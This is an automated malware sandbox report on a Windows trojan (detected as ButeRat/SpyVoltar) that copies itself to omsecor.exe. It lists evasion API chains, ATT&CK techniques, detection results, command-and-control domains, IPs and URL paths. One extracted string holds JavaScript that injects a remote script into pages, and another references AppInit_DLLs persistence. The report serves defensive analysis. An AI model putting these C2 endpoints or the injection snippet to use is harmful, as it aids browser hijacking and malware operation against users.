          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-5861
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-5784
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeAPI coverage: 8.6 %
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 4344Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 4620Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2876Thread sleep time: -130000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2876Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040ABD9 FindFirstFileW,FindClose,5_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeThread delayed: delay time: 60000Jump to behavior
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000729000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.000000000068F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeAPI call chain: ExitProcess graph end nodegraph_0-5889
          Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_5-5889
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,0_2_004075D4
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004032B8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CD66
          Source: nNX5KYQRhg.exe, omsecor.exeBinary or memory string: Shell_TrayWnd
          Source: nNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.drBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CB03 cpuid 0_2_0040CB03
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,0_2_00407267
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00407499
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00406CB5 GetVersionExW,0_2_00406CB5
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          2
          Process Injection
          121
          Masquerading
          OS Credential Dumping2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts21
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Virtualization/Sandbox Evasion
          LSASS Memory21
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Process Injection
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS11
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          nNX5KYQRhg.exe87%ReversingLabsWin32.Trojan.ButeRat
          nNX5KYQRhg.exe100%AviraTR/SpyVoltar.absza
          nNX5KYQRhg.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\omsecor.exe100%AviraTR/SpyVoltar.absza
          C:\Windows\SysWOW64\omsecor.exe100%AviraTR/SpyVoltar.absza
          C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
          C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          lousta.net
          193.166.255.171
          truetrue
            unknown
            mkkuei4kdsz.com
            15.197.204.56
            truetrue
              unknown
              ow5dirasuek.com
              52.34.198.229
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://mkkuei4kdsz.com/932/965.htmltrue
                  unknown
                  http://lousta.net/761/49.htmltrue
                    unknown
                    http://mkkuei4kdsz.com/true
                      unknown
                      http://mkkuei4kdsz.com/87/444.htmltrue
                        unknown
                        http://lousta.net/639/772.htmltrue
                          unknown
                          http://lousta.net/719/772.htmltrue
                            unknown
                            http://ow5dirasuek.com/65/168.htmltrue
                              unknown
                              http://mkkuei4kdsz.com/558/583.htmltrue
                                unknown
                                http://mkkuei4kdsz.com/477/877.htmltrue
                                  unknown
                                  http://ow5dirasuek.com/158/381.htmltrue
                                    unknown
                                    ht:/r.irsf.o/true
                                      unknown
                                      http://lousta.net/106/649.htmltrue
                                        unknown
                                        http://lousta.net/883/755.htmltrue
                                          unknown
                                          http://ow5dirasuek.com/913/437.htmltrue
                                            unknown
                                            http://lousta.net/107/805.htmltrue
                                              unknown
                                              ht:/w.irsf.o/true
                                                unknown
                                                http://lousta.net/810/632.htmltrue
                                                  unknown
                                                  http://lousta.net/761/32.htmltrue
                                                    unknown
                                                    http://lousta.net/97/341.htmltrue
                                                      unknown
                                                      http://lousta.net/128/758.htmltrue
                                                        unknown
                                                        http://ow5dirasuek.com/524/9.htmltrue
                                                          unknown
                                                          http://lousta.net/691/461.htmltrue
                                                            unknown
                                                            http://lousta.net/true
                                                              unknown
                                                              http://lousta.net/171/705.htmltrue
                                                                unknown
                                                                http://ow5dirasuek.com/640/808.htmltrue
                                                                  unknown
                                                                  http://mkkuei4kdsz.com/922/501.htmltrue
                                                                    unknown
                                                                    http://ow5dirasuek.com/503/726.htmltrue
                                                                      unknown
                                                                      http://mkkuei4kdsz.com/126/170.htmltrue
                                                                        unknown
                                                                        http://ow5dirasuek.com/true
                                                                          unknown
                                                                          http://lousta.net/526/179.htmltrue
                                                                            unknown
                                                                            http://lousta.net/404/921.htmltrue
                                                                              unknown
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              http://lousta.net/171/705.html-2omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://lousta.net/526/179.htmlQomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://ow5dirasuek.com/640/808.html)leomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://lousta.net/106/649.htmloomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://lousta.net/691/461.html0n:omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://lousta.net/810/632.htmlyomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://ow5dirasuek.com/524/9.html)omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://mkkuei4kdsz.com/558/583.html1omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://mkkuei4kdsz.com/126/170.htmll4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://lousta.net/883/755.htmlLomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://ow5dirasuek.com/524/9.html9omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://ow5dirasuek.com/524/9.html0omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://mkkuei4kdsz.com/126/170.htmlWomsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://ow5dirasuek.com/503/726.html(omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://lousta.net/639/772.htmlBomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://lousta.net/761/32.htmlAomsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://lousta.net/639/772.htmlGomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://ow5dirasuek.com/65/168.htRomsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://lousta.net/761/32.html=omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://ow5dirasuek.com/640/808.htmloomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://ow5dirasuek.com/503/726.htmlom/913/437.htmlomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://ow5dirasuek.com/524/9.htmlAomsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://mkkuei4kdsz.com/87/444.htmlj4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://mkkuei4kdsz.com/558/583.htmlom/4;lsomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://mkkuei4kdsz.com/558/583.html1lomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://lousta.net/639/772.htmlKomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://lousta.net/761/32.htmli=omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://ow5dirasuek.com/65/168.htmlUomsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://lousta.net/com/pomsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://ow5dirasuek.com/524/9.htmllComsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://ow5dirasuek.com/9Slomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://lousta.net/761/32.htmlbomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://ow5dirasuek.com/524/9.htmllomsecor.exe, 00000005.00000002.2717777167.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://mkkuei4kdsz.com/922/501.html22658-3693405117-2476omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://mkkuei4kdsz.com/922/501.htmlBuomsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://ow5dirasuek.com/Zomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://mkkuei4kdsz.com/558/583.htmlpomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://mkkuei4kdsz.com/922/501.htmlLomsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://lousta.net/691/461.html-2omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://lousta.net/761/49.htmluomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://lousta.net/639/772.htmlaomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://lousta.net/691/461.html4omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://ow5dirasuek.com/524/9.htmlwomsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://ow5dirasuek.com/503/726.htmlasuek.comomsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://ow5dirasuek.com/lousta.net5omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://ow5dirasuek.com/524/9.htmlyomsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://ow5dirasuek.com/524/9.htmloomsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://ow5dirasuek.com/524/9.htmlsomsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://lousta.net/691/461.html5n1omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://ow5dirasuek.com/524/9.htmll%omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://ow5dirasuek.com/524/9.htmlqomsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://lousta.net/691/461.html)n%omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://ow5dirasuek.com/503/726.htmlKlomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconnNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://lousta.net/106/649.htmlshqos.dll.muiomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://lousta.net/761/32.html22-2omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://ow5dirasuek.com/158/381.html4uomsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://lousta.net/810/632.htmlHomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://mkkuei4kdsz.com/126/170.html3omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://mkkuei4kdsz.com/87/444.htmlp4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://mkkuei4kdsz.com/126/170.htmlH4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://lousta.net/107/805.html(omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lousta.net/691/461.htmlenaomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lousta.net/691/461.htmlhtmlomsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              193.166.255.171
                                                                                                                                                                                                              lousta.netFinland
                                                                                                                                                                                                              1741FUNETASFItrue
                                                                                                                                                                                                              52.34.198.229
                                                                                                                                                                                                              ow5dirasuek.comUnited States
                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                              15.197.204.56
                                                                                                                                                                                                              mkkuei4kdsz.comUnited States
                                                                                                                                                                                                              7430TANDEMUStrue
                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1546830
                                                                                                                                                                                                              Start date and time:2024-11-01 16:21:07 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 4m 39s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:nNX5KYQRhg.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:682abf7611b349bb614207e0fcca057ab84389a6.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.bank.troj.evad.winEXE@7/3@3/3
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              • Number of executed functions: 23
                                                                                                                                                                                                              • Number of non-executed functions: 116
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • VT rate limit hit for: nNX5KYQRhg.exe
                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              11:22:09API Interceptor28x Sleep call for process: omsecor.exe modified
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              193.166.255.171bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/562/252.html
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/989/145.html
                                                                                                                                                                                                              Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                              Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                              document.log.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                                                                                                                                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                              • www.synetik.net/
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/161/343.html
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/372/625.html
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/766/881.html
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • lousta.net/240/311.html
                                                                                                                                                                                                              52.34.198.229bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/776/947.html
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/145/281.html
                                                                                                                                                                                                              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygyvuj.com/login.php
                                                                                                                                                                                                              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygyvuj.com/login.php
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/968/405.html
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/944/938.html
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • ow5dirasuek.com/643/773.html
